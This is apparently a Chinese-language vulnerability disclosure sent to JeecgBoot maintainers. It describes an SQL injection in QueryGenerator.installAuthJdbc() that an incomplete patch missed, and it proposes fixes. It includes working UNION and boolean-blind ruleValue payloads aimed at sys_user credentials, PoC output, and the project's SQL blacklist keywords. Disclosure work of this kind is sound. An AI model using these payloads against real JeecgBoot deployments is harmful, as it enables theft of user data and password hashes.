JeecgBoot QueryGenerator.installAuthJdbc() SQL注入漏洞（issue #9434 补丁不完整）
============================================================

一、漏洞基本信息

项目          详情
漏洞名称      JeecgBoot QueryGenerator.installAuthJdbc() SQL注入（#9434 补丁不完整）
产品          JeecgBoot / Jeecg-Boot
版本          <= 最新 main 分支 (commit 3f826c4, 2026-05-21)
漏洞类型      SQL注入 (CWE-89)
严重程度      高危 (CVSS 3.1: 7.7)
CVSS向量      AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
状态          截至最新版本仍未修补
发现日期      2026-05-22
验证日期      2026-05-23（H2 PoC 双验证通过 + 官方最新源码对比确认）

============================================================

二、漏洞成因：#9434 补丁不完整

2026-03-31 的 issue #9434 修补了 QueryGenerator 类的 SQL 注入漏洞，
在 installMplus() 和 installAuthMplus() 两个方法中增加了
SqlInjectionUtil.filterContent() 过滤调用。

但同一个类中的第三个方法 installAuthJdbc() 存在完全相同的代码模式
（getSqlRuleValue() 拼接 SQL），却被遗漏，没有加任何过滤。

三个方法对比

文件: jeecg-boot/jeecg-boot-base-core/src/main/java/org/jeecg/common/system/query/QueryGenerator.java

(1) installMplus() — 第136-143行 [已修补]

    for (String c : ruleMap.keySet()) {
        if(oConvertUtils.isNotEmpty(c) && c.startsWith(SQL_RULES_COLUMN)){
            String sqlRule = getSqlRuleValue(ruleMap.get(c).getRuleValue());
            SqlInjectionUtil.filterContent(sqlRule, null);   // <-- 有过滤
            queryWrapper.and(i ->i.apply(sqlRule));
        }
    }

(2) installAuthMplus() — 第994-1001行 [已修补]

    for (String c : ruleMap.keySet()) {
        if(oConvertUtils.isNotEmpty(c) && c.startsWith(SQL_RULES_COLUMN)){
            String sqlRule = getSqlRuleValue(ruleMap.get(c).getRuleValue());
            SqlInjectionUtil.filterContent(sqlRule, null);   // <-- 有过滤
            queryWrapper.and(i ->i.apply(sqlRule));
        }
    }

(3) installAuthJdbc() — 第949-952行 [未修补]

    for (String c : ruleMap.keySet()) {
        if(oConvertUtils.isNotEmpty(c) && c.startsWith(SQL_RULES_COLUMN)){
            sb.append(sqlAnd+getSqlRuleValue(ruleMap.get(c).getRuleValue()));
            // 直接拼接到 StringBuffer，没有 SqlInjectionUtil.filterContent()
        }
    }

============================================================

三、注入点分析

installAuthJdbc() 返回的 SQL 字符串最终通过 MyBatis XML 的 ${} 语法
直接拼接到最终 SQL 中：

文件: jeecg-module-demo/.../mapper/xml/JeecgDemoMapper.xml 第10-12行

    <!-- 根据权限sql查询数据集 20230904 内部写法，调用位置installAuthJdbc，暂不处理sql注入问题-->
    <select id="queryListWithPermission" parameterType="Object"
            resultType="org.jeecg.modules.demo.test.entity.JeecgDemo">
        select * from demo where 1=1 ${permissionSql}
    </select>

关键点：
- 使用了 ${permissionSql}（字符串直接替换）而非 #{permissionSql}（预编译参数）
- 注意到第10行注释中标注了该位置的 SQL 注入风险记录（2023-09-04），
  可能尚未排入修复计划

Mapper 接口签名 (JeecgDemoMapper.java 第33行):

    public IPage<JeecgDemo> queryListWithPermission(
        Page<JeecgDemo> page, @Param("permissionSql") String permissionSql);

============================================================

四、完整调用链

1. JeecgDemoServiceImpl.java:94
   String sql = QueryGenerator.installAuthJdbc(JeecgDemo.class);
   return this.baseMapper.queryListWithPermission(page, sql);

2. QueryGenerator.java:951  [漏洞点]
   sb.append(sqlAnd + getSqlRuleValue(ruleMap.get(c).getRuleValue()));
   // getRuleValue() 来自 sys_permission_data_rule 表，攻击者可控
   // 无 SqlInjectionUtil.filterContent() 过滤

3. JeecgDemoMapper.xml:12  [注入执行点]
   select * from demo where 1=1 ${permissionSql}
   // ${} 字符串替换，非预编译，恶意 SQL 直接执行

============================================================

五、攻击利用

前提条件

攻击者需要登录系统并具有"数据权限规则"的配置权限（通常是管理员角色）。
这不是未授权漏洞，属于权限后利用/特权提升场景（应用管理员 -> 数据库级访问）。

攻击链

1. 以管理员身份登录 JeecgBoot 系统
2. 进入"系统管理 -> 数据权限 -> 数据规则"
3. 新增一条规则，规则类型选 SQL_RULES_COLUMN
4. 在 ruleValue 中填入恶意 SQL payload
5. 保存规则（持久化到 sys_permission_data_rule 表）
6. 之后任何用户触发使用了 installAuthJdbc() 的查询时，注入生效

利用场景

场景1 — UNION 跨表窃取

    ruleValue: 1=2 UNION SELECT id, username, id FROM sys_user WHERE 1=1 OR 1=1
    效果: 原本查 demo 表，结果带出了 sys_user 表的用户名

场景2 — 布尔盲注猜解密码

    ruleValue: 1=1 AND SUBSTRING((SELECT password FROM sys_user WHERE username='admin'),1,1)='a'
    效果: 逐字符猜解 admin 用户的密码哈希

============================================================

六、为什么 SqlInjectionUtil.filterContent() 在此处完全无效

installAuthJdbc() 完全没有调用 filterContent()，因此 SqlInjectionUtil 的
所有黑名单关键词检查对此方法完全不起作用。

参考 SqlInjectionUtil.java 中的检测关键词（第29行）:

    "and |exec |select |delete |update |drop |count |chr |mid |master
     |truncate |char |declare |;|or |+|--"

以及正则检测（第56-87行）: sleep\s*\(, benchmark\s*\(, database\s*\( 等。

这些防护对 installAuthJdbc() 无任何效果，因为根本没被调用。

补充说明

installAuthJdbc() 的代码路径与 installMplus()/installAuthMplus() 不同：
- 后者使用 MyBatis-Plus 的 queryWrapper.apply(sqlRule) — 有一定参数化保护
- 前者直接拼接 StringBuffer -> 传入 XML ${} — 完全没有任何参数化

即使加上 filterContent()，长期仍建议将 ${} 改为预编译方式，
因为黑名单方式本身存在绕过风险。

============================================================

七、修复建议

短期修补（与 installAuthMplus 相同模式）

QueryGenerator.java 第951行，将:

    sb.append(sqlAnd+getSqlRuleValue(ruleMap.get(c).getRuleValue()));

改为:

    String sqlRule = getSqlRuleValue(ruleMap.get(c).getRuleValue());
    SqlInjectionUtil.filterContent(sqlRule, null);
    sb.append(sqlAnd + sqlRule);

长期根治

1. 移除 XML 中的 ${permissionSql} 写法，改用 MyBatis 动态 SQL 或预编译方式
2. 审计所有使用 getSqlRuleValue() 的调用点，确保都有过滤
3. 对 sys_permission_data_rule 表中 SQL_RULES_COLUMN 类型的规则值增加写入时校验

============================================================

八、PoC 验证

已用 H2 数据库模拟验证（VerifySQLi.java），两种攻击方式均确认有效:

1. UNION 注入: 成功跨表窃取 sys_user 表数据

    输入 ruleValue: 1=2 UNION SELECT id, username, id FROM sys_user WHERE 1=1 OR 1=1
    实际执行 SQL:   SELECT * FROM demo WHERE 1=1 AND 1=2 UNION SELECT id, username, id FROM sys_user WHERE 1=1 OR 1=1
    输出结果:       id=1 name=admin age=1 / id=2 name=jeecg age=2

2. 布尔盲注: 成功逐字符猜解 admin 密码

    输入 ruleValue: 1=1 AND SUBSTRING((SELECT password FROM sys_user WHERE username='admin'),1,1)='a'
    验证方式:       逐字符猜解，当字符正确时返回数据，错误时返回空
    猜解结果:       admin123

============================================================

九、源码验证

以下行号对应 GitHub 最新 main 分支 (commit 3f826c4, 2026-05-21):

证据                          文件                          行号
installMplus 已修补           QueryGenerator.java           136-143
installAuthMplus 已修补       QueryGenerator.java           994-1001
installAuthJdbc 未修补        QueryGenerator.java           949-952
${}拼接 + 注释标注            JeecgDemoMapper.xml           10-12
Service 调用入口              JeecgDemoServiceImpl.java     91-96
Mapper 接口 @Param            JeecgDemoMapper.java          33

============================================================

感谢贵团队关注此问题。如需进一步沟通或协助验证，欢迎回复。
